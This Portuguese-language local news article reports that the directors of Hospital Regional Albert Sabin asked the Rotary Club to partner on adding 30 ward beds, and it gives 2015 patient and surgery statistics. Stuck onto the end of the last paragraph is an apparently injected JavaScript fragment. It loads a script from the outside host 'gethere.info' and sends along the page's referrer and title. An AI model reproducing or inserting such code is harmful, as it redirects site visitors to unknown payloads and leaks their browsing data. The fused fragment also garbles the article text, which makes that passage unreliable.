Capa / Cidades / Diretor busca parceria do Rotary para ampliação do hospital regional

Diretor busca parceria do Rotary para ampliação do hospital regional

downloadDionéia Martins

Os diretores do Hospital Regional Albert Sabin participaram na noite de segunda-feira, 11, de uma reunião do Rotary Club para mostrar a situação do hospital e requerer parceria no projeto de ampliação da estrutura da unidade hospitalar.
O diretor técnico e médico ginecologista, Sérgio Dezanetti e o diretor administrativo, José Marcos da Silva, disseram que a intenção da direção do hospital em fazer um primeiro contato com a entidade, foi de verificar a possibilidade do Rotary de enfrentarem esse desafio juntos.
O diretor administrativo demostrou aos rotarianos as estatísticas de atendimento hospitalar da unidade. Somente em 2015 o HRAS realizou em torno de 30 mil atendimentos entre ambulatórias, internações e cirurgias, esse número representa 30% da população dos seis municípios que compõem a região do Alto Tapajós.
A necessidade de ampliação do espaço físico é fundamental para o atendimento de toda essa população. O hospital hoje atende acima do que é recomendado pelo Ministério da Saúde para segurança dos próprios pacientes. Em 2015 foram mais de 2 mil cirurgias de ortopedia, obstetrícia e ginecologia, buco maxilo e geral, realizada na unidade hospital.
Segundo José Marcos os número para 2016 devem superar os de 2015, a quantidade de atendimento realizado nos três primeiros meses desse ano já superaram os do mesmo período. Hoje o hospital possui 74 leitos e o projeto prevê a construção de mais 30 leitos de enfermaria. O valor do investimento necessário não foi revelado.
José Marcos esclareceu que hoje o hospital está com a estrutura comprometida em relação ao que necessita para o serviço e que o hospital gasta mais para produzir menos, por isso precisa de investimento para funcionar da forma que necessita.
“Um hospital abaixo de 120 leitos não alcança o equilíbrio econômico financeiro, ele sempre vai gastar mais do que ele poderia, para produzir o mesmo serviço, portanto, nós já sabemos que temos um gasto mensal acima daquilo que ele pode produzir”.
O presidente do Rotary Juliano dos Santos Cezar disse que essa reunião foi uma conversa inicial mas que a entidade tem interesse em participar do projeto. “Trata-se de uma grande oportunidade de estarmos mais uma vez colaborando com a comunidade e exercendo o nosso papel enquanto Rotarianos, cujo lema é o “dar de sí, antes de pensar em sí”, disse o presidente.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top